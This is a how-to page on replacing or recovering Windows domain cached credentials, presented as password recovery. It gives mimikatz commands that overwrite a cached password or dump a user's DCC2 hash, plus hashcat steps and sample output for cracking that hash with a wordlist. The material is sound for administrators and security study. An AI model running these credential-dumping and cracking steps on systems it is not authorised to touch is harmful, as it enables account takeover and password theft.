tinyapps.org / docs / Replace or recover domain cached credentials


1. Replace

Cached domain credentials can be modified with mimikatz's /kiwi switch1:

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::cache /user:user-to-modify /password:new-password /kiwi

While logging in via the reset password works, data secured by DPAPI (Data Protection API) is inaccessible after the change.2,3 Programs that leverage DPAPI include: EFS, Microsoft Outlook, Windows Live Mail, and Google Chrome, among others (though notably not Mozilla Firefox).4,5

2. Recover

Rather than replacing domain cached credentials, decrypting them may be possible:

2.1 Get the username and hash

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::cache
...
* Iteration is set to default (10240)
...
[NL$1 - 2/23/2013 4:48:29 PM]
RID       : 0000045a (1114)
User      : MYDOMAIN\jsmith
MsCacheV2 : e4e4e18ac7d15990f64ebe1be1989d9f
2.1.1 Save to hash.txt like so:

$DCC2$10240#jsmith#e4e4e18ac7d15990f64ebe1be1989d9f

2.2 Crack the hash

2.2.1 Acquire hashcat
$ git clone https://github.com/hashcat/hashcat.git
$ cd hashcat/
$ make
2.2.2 Begin cracking6

$ hashcat -a 0 -m 2100 --status -o found.txt hash.txt rocktastic.txt

-a 0 = set attack mode to straight / dictionary attack
-m 2100 = set hash mode to "Domain Cached Credentials 2 (DCC2), MS Cache 2"
--status = automatically update status screen
-o found.txt = output recovered password to found.txt
hash.txt = the hash we saved in step 2.1.1
rocktastic.txt = Rocktastic: "a word list on steroids"

2.2.3 If the stars align...
Status...........: Cracked
Hash.Type........: Domain Cached Credentials 2 (DCC2), MS Cache 2
Hash.Target......: $DCC2$10240#jsmith#e4e4e18ac7d15990f64ebe1be1989d9f
...
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts

Footnotes

  1. Special thanks to hft for sharing the undocumented /kiwi switch.
  2. "Utilities exist that can help overwrite the cached verifier. By using one of these utilities, an attacker can authenticate by using the overwritten value. ... Overwriting the password does not help an attacker replace the verifier, because the base keying material is incorrect. Therefore, data that is encrypted by using Encrypting File System or by using the Data Protection API (DPAPI) will not decrypt." —Cached credentials security in Windows Server 2003, in Windows XP, and in Windows 2000

  3. "Even though someone overrides Cached Logon Data, this person is not able to get access to our data protection API protected data." —Cached Credentials: Important Facts That You Cannot Miss

  4. "On Windows, Chrome encrypts the passwords with Windows DPAPI, which can be decrypted by any program running as the Windows user, unless the user's logon password is forcibly reset." —Comment by Ben N on Information Security

  5. "Chrome and IE use DPAPI for secrets, Firefox just uses a plaintext master key file since Mozilla is too cool for Windows." —Tweet by SwiftOnSecurity

  6. For better cracking performance, pair your wordlist with a high-quality basic rules file.

Additional Notes

Additional Sources

More Information


last update: 2019.02.05